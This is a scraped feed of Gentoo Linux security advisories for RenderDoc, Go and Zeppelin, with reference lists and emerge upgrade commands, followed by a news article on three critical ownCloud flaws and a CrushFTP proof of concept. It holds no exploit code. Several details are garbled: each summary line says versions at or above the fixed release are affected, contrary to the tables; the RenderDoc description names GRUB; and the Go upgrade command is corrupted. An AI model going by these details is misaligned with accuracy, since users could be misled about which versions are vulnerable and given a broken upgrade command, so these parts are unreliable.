[ 91 ] CVE-2023-5477  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5477  
[ 92 ] CVE-2023-5478  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5478  
[ 93 ] CVE-2023-5479  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5479  
[ 94 ] CVE-2023-5480  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5480  
[ 95 ] CVE-2023-5481  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5481  
[ 96 ] CVE-2023-5482  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5482  
[ 97 ] CVE-2023-5483  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5483  
[ 98 ] CVE-2023-5484  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5484  
[ 99 ] CVE-2023-5485  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5485  
[ 100 ] CVE-2023-5486  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5486  
[ 101 ] CVE-2023-5487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5487  
[ 102 ] CVE-2023-5849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5849  
[ 103 ] CVE-2023-5850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5850  
[ 104 ] CVE-2023-5851  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5851  
[ 105 ] CVE-2023-5852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5852  
[ 106 ] CVE-2023-5853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5853  
[ 107 ] CVE-2023-5854  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5854  
[ 108 ] CVE-2023-5855  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5855  
[ 109 ] CVE-2023-5856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5856  
[ 110 ] CVE-2023-5857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5857  
[ 111 ] CVE-2023-5858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5858  
[ 112 ] CVE-2023-5859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5859  
[ 113 ] CVE-2023-5996  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5996  
[ 114 ] CVE-2023-5997  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5997  
[ 115 ] CVE-2023-6112  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6112  
[ 116 ] CVE-2023-21775  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21775  
[ 117 ] CVE-2023-21796  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21796

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-11

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-11

Gentoo Linux Security Advisory 202311-10 - Multiple vulnerabilities have been discovered in RenderDoc, the worst of which leads to remote code execution. Versions greater than or equal to 1.27 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: RenderDoc: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #908031  
       ID: 202311-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in RenderDoc, the worst of  
which leads to remote code execution.

Background  
=========  
RenderDoc is a free MIT licensed stand-alone graphics debugger that  
allows quick and easy single-frame capture and detailed introspection of  
any application using Vulkan, D3D11, OpenGL & OpenGL ES or D3D12 across  
Windows, Linux, Android, or Nintendo Switch™.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-gfx/renderdoc  < 1.27        >= 1.27

Description  
==========  
Multiple vulnerabilities have been discovered in GRUB. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All RenderDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/renderdoc-1.27"

References  
=========  
[ 1 ] CVE-2023-33863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33863  
[ 2 ] CVE-2023-33864  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33864  
[ 3 ] CVE-2023-33865  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33865

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-10

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-10

Gentoo Linux Security Advisory 202311-9 - Multiple vulnerabilities have been discovered in Go, the worst of which could lead to remote code execution. Versions greater than or equal to 1.20.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Go: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #873637, #883783, #894478, #903979, #908255, #915555, #916494  
       ID: 202311-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Go, the worst of which  
could lead to remote code execution.

Background  
=========  
Go is an open source programming language that makes it easy to build  
simple, reliable, and efficient software.

Affected packages  
================  
Package      Vulnerable    Unaffected  
-----------  ------------  ------------  
dev-lang/go  < 1.20.10     >= 1.20.10

Description  
==========  
Multiple vulnerabilities have been discovered in Go. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Go users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/go-1.20.10"  
  # emerge --ask --oneshot --verbose @golang-rebuild

References  
=========  
[ 1 ] CVE-2022-2879  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2879  
[ 2 ] CVE-2022-2880  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2880  
[ 3 ] CVE-2022-41715  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41715  
[ 4 ] CVE-2022-41717  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41717  
[ 5 ] CVE-2022-41723  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41723  
[ 6 ] CVE-2022-41724  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41724  
[ 7 ] CVE-2022-41725  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41725  
[ 8 ] CVE-2023-24534  
      https://nvd.nist.gov/vuln/detail/CVE-2023-24534  
[ 9 ] CVE-2023-24536  
      https://nvd.nist.gov/vuln/detail/CVE-2023-24536  
[ 10 ] CVE-2023-24537  
      https://nvd.nist.gov/vuln/detail/CVE-2023-24537  
[ 11 ] CVE-2023-24538  
      https://nvd.nist.gov/vuln/detail/CVE-2023-24538  
[ 12 ] CVE-2023-29402  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29402  
[ 13 ] CVE-2023-29403  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29403  
[ 14 ] CVE-2023-29404  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29404  
[ 15 ] CVE-2023-29405  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29405  
[ 16 ] CVE-2023-29406  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29406  
[ 17 ] CVE-2023-29409  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29409  
[ 18 ] CVE-2023-39318  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39318  
[ 19 ] CVE-2023-39319  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39319  
[ 20 ] CVE-2023-39320  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39320  
[ 21 ] CVE-2023-39321  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39321  
[ 22 ] CVE-2023-39322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39322  
[ 23 ] CVE-2023-39323  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39323  
[ 24 ] CVE-2023-39325  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39325  
[ 25 ] CVE-2023-44487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44487

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-09

Gentoo Linux Security Advisory 202311-4 - Multiple vulnerabilities have been discovered in Zeppelin, the worst of which could lead to remote code execution. Versions greater than or equal to 0.10.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Zeppelin: Multiple Vulnerabilities  
     Date: November 24, 2023  
     Bugs: #811447  
       ID: 202311-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Zeppelin, the worst of  
which could lead to remote code execution.

Background  
==========

Apache Zeppelin is a web-based notebook that enables data-driven,  
interactive data analytics and collaborative documents with SQL, Scala,  
Python, R and more.

Affected packages  
=================

Package                Vulnerable    Unaffected  
---------------------  ------------  ------------  
www-apps/zeppelin-bin  < 0.10.1      >= 0.10.1

Description  
===========

Multiple vulnerabilities have been discovered in Zeppelin. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Zeppelin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apps/zeppelin-bin-0.10.1"

References  
==========

[ 1 ] CVE-2019-10095  
      https://nvd.nist.gov/vuln/detail/CVE-2019-10095  
[ 2 ] CVE-2020-13929  
      https://nvd.nist.gov/vuln/detail/CVE-2020-13929  
[ 3 ] CVE-2021-27578  
      https://nvd.nist.gov/vuln/detail/CVE-2021-27578

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-04

The maintainers of the open-source file-sharing software ownCloud have warned of three critical security flaws that could be exploited to disclose sensitive information and modify files.
A brief description of the vulnerabilities is as follows -

Disclosure of sensitive credentials and configuration in containerized deployments impacting graphapi versions from 0.2.0 to 0.3.0. (CVSS score: 10.0)

Data Security / Vulnerability

The maintainers of the open-source file-sharing software ownCloud have warned of three critical security flaws that could be exploited to disclose sensitive information and modify files.

A brief description of the vulnerabilities is as follows -

*   Disclosure of sensitive credentials and configuration in containerized deployments impacting graphapi versions from 0.2.0 to 0.3.0. (CVSS score: 10.0)
*   WebDAV Api Authentication Bypass using Pre-Signed URLs impacting core versions from 10.6.0 to 10.13.0 (CVSS score: 9.8)
*   Subdomain Validation Bypass impacting oauth2 prior to version 0.6.1 (CVSS score: 9.0)

"The 'graphapi' app relies on a third-party library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo)," the company said of the first flaw.

"This information includes all the environment variables of the web server. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key."

As a fix, ownCloud is recommending to delete the "owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php" file and disable the 'phpinfo' function. It is also advising users to change secrets like the ownCloud admin password, mail server and database credentials, and Object-Store/S3 access keys.

The second problem makes it possible to access, modify or delete any file sans authentication if the username of the victim is known and the victim has no signing-key configured, which is the default behavior.

Lastly, the third flaw relates to a case of improper access control that allows an attacker to "pass in a specially crafted redirect-url which bypasses the validation code and thus allows the attacker to redirect callbacks to a TLD controlled by the attacker."

Besides adding hardening measures to the validation code in the oauth2 app, ownCloud has suggested that users disable the "Allow Subdomains" option as a workaround.

The disclosure comes as a proof-of-concept (PoC) exploit has been released for a critical remote code execution vulnerability in the CrushFTP solution (CVE-2023-43177) that could be weaponized by an unauthenticated attacker to access files, run arbitrary programs on the host, and acquire plain-text passwords.

The issue has been addressed in CrushFTP version 10.5.2, which was released on August 10, 2023.

"This vulnerability is critical because it does NOT require any authentication," CrushFTP noted in an advisory released at the time. "It can be done anonymously and steal the session of other users and escalate to an administrator user."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#rce